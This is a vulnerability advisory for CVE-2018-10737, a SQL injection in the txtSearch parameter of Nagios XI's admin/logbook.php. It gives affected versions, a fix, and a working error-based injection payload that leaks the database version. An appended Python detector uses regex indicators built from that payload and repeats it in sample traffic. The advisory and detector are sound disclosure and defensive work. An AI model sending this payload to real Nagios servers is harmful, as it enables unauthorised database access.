NagiosXI <= 5.4.12 logbook.php... CVE-2018-10737 CNNVD-201805-492

CVSS score: 6.5
Published: 2018-05-16
Revised: 2018-06-15

### NagiosXI <= 5.4.12 logbook.php SQL injection (CVE-2018-10737)

#### Description

A SQL injection issue was discovered in Nagios XI via the admin/logbook.php txtSearch parameter.

#### Affected Version

* Nagios XI 5.2.x
* Nagios XI 5.4.x before 5.4.13

#### Proof of concept

```
http://xxxx/nagiosql/admin/logbook.php
postdata: txtSearch=-1%' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
```

![](https://images.seebug.org/1525858933615-w331s)

#### Fix

Upgrade to version 5.4.13
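Detection logic for the request shape in the proof of concept, added here as an example and not part of the original advisory or of Nagios XI: it inspects POST bodies sent to admin/logbook.php and reports which patterns from the payload above appear in the decoded txtSearch value. The host name nagios.example, the sample requests, the function names and the indicator names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/admin/logbook.php"  # path from the advisory
PARAM = "txtSearch"              # parameter from the advisory

# Heuristics derived from the proof of concept above; an assumption of this
# example, not a complete SQL injection rule set.
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*(and|or|union)\b", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "trailing_comment": re.compile(r"(#|--)\s*$"),
}

def indicators_in(value):
    """Return the sorted names of indicators matching one decoded value."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(value))

def scan(requests):
    """requests: iterable of (method, url, body). Returns [(index, hits)]."""
    alerts = []
    for i, (method, url, body) in enumerate(requests):
        if method.upper() != "POST" or not urlsplit(url).path.endswith(ENDPOINT):
            continue
        # parse_qs URL-decodes the body; a malformed escape such as "%'" stays literal.
        for value in parse_qs(body, keep_blank_values=True).get(PARAM, []):
            hits = indicators_in(value)
            if hits:
                alerts.append((i, hits))
    return alerts

# Constructed sample traffic; the last body is the advisory's proof of concept.
URL = "http://nagios.example/nagiosql/admin/logbook.php"
POC = ("txtSearch=-1%' and (select 1 from(select count(*),concat((select "
       "(select (select concat(0x7e,version(),0x7e))) from information_schema."
       "tables limit 0,1),floor(rand(0)*2))x from information_schema.tables "
       "group by x)a)#")
SAMPLE = [("POST", URL, "txtSearch=host+down"),
          ("POST", URL, "txtSearch=O%27Reilly"),
          ("GET", URL, ""),
          ("POST", URL, POC)]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE):
        print(f"request {idx}: {PARAM} matched {', '.join(hits)}")
```

Only the fourth sample request is reported; the two benign searches, including the one containing an apostrophe, match no indicator.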
